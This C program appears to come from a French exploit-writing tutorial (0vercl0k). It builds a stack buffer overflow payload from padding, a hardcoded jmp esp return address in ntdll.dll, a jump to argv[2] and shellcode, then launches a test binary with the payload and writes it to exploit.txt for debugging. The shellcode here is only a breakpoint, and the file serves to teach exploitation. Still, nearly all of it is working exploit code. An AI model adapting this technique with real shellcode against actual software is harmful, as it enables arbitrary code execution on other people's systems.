#include <string.h>
#include <stdio.h>
#include <windows.h>

int main()
{
    //                      Argv[1]                                                       Argv[2]
    //[ [20octets 'A' x 20] [ 4octets ret sur un jmp esp ] [5octets jmp sur argv[2] ] [ [shellcode] ]

    FILE* fp = fopen("exploit.txt","w");
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};

    si.cb = sizeof(si);

    char shellcode[] = "\xCC"; //INT 3

    char ret[] = "\xED\x1E\x95\x7C"; //dans ntdll.dll sur un jmp esp
    char ret2[] = "\xE9\x5E\x25\x1B"; // JMP sur l'argv[2], 4octet seulement car il y a un 00.
    char name[] = "test.exe ";
    char* remplissage = (char*) malloc(sizeof(char) * 21);

    remplissage[20] = '\0';
    memset(remplissage,'a',20);

    int alloc = ((strlen(name) + strlen(remplissage) + strlen(ret) + (strlen(ret2)+1) + 1 + strlen(shellcode) + 1 ));

    char* exploitation = (char*) malloc(sizeof(char) * alloc );
    ZeroMemory(exploitation,alloc);

    strncat(exploitation,name,strlen(name));
    strncat(exploitation,remplissage,strlen(remplissage));
    strncat(exploitation,ret,strlen(ret));
    strncat(exploitation,ret2,strlen(ret2)+1);
    strncat(exploitation," ",1);
    strncat(exploitation,shellcode,strlen(shellcode)+1);

    fwrite(exploitation,sizeof(char),strlen(exploitation),fp);
    printf("Exploit 2 - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    if(CreateProcess(NULL,exploitation,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
    {
        printf("Processus cree.Vous pouvez consulter le fichier exploit.txt pour tester avec ollyDbg.\n");
    }

    WaitForSingleObject(pi.hProcess,INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    fclose(fp);
    return 0;
}